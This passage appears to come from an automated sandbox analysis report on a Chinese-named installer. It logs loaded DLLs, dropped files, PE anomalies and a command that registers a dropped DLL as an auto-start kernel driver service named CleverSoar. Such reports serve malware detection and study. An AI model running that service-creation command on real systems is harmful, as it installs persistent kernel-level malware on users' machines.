Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeStatic file information: File size 7495744 > 1048576
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2169234402.0000000002150000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2169131101.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_008457D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_008457D0
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.5.drStatic PE information: real checksum: 0x0 should be: 0x343ce5
Source: update.vac.6.drStatic PE information: real checksum: 0x0 should be: 0x372ce7
Source: update.vac.2.drStatic PE information: real checksum: 0x0 should be: 0x372ce7
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x343ce5
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeStatic PE information: real checksum: 0x0 should be: 0x72e436
Source: hrsw.vbc.6.drStatic PE information: real checksum: 0x0 should be: 0x372ce7
Source: tProtect.dll.12.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.2.drStatic PE information: section name: .00cfg
Source: update.vac.2.drStatic PE information: section name: .voltbl
Source: update.vac.2.drStatic PE information: section name: .8Tk
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.5.drStatic PE information: section name: .didata
Source: 7zr.exe.6.drStatic PE information: section name: .sxdata
Source: hrsw.vbc.6.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.6.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.6.drStatic PE information: section name: .8Tk
Source: update.vac.6.drStatic PE information: section name: .00cfg
Source: update.vac.6.drStatic PE information: section name: .voltbl
Source: update.vac.6.drStatic PE information: section name: .8Tk
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CC586EB push ecx; ret 6_2_6CC586FE
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CB00F00 push ss; retn 0001h6_2_6CB00F0A
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CD26F10 push eax; ret 6_2_6CD26F2E
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CC8B9F4 push 004AC35Ch; ret 6_2_6CC8BA0E
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CD27290 push eax; ret 6_2_6CD272BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007C45F4 push 0086C35Ch; ret 10_2_007C460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0085FB10 push eax; ret 10_2_0085FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0085FE90 push eax; ret 10_2_0085FEBE
Source: update.vac.2.drStatic PE information: section name: .8Tk entropy: 7.190790923053346
Source: hrsw.vbc.6.drStatic PE information: section name: .8Tk entropy: 7.190790923053346
Source: update.vac.6.drStatic PE information: section name: .8Tk entropy: 7.190790923053346
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeFile created: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-U1N14.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeFile created: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-MRB94.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-U1N14.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-MRB94.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-MRB94.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-U1N14.tmp\update.vacJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
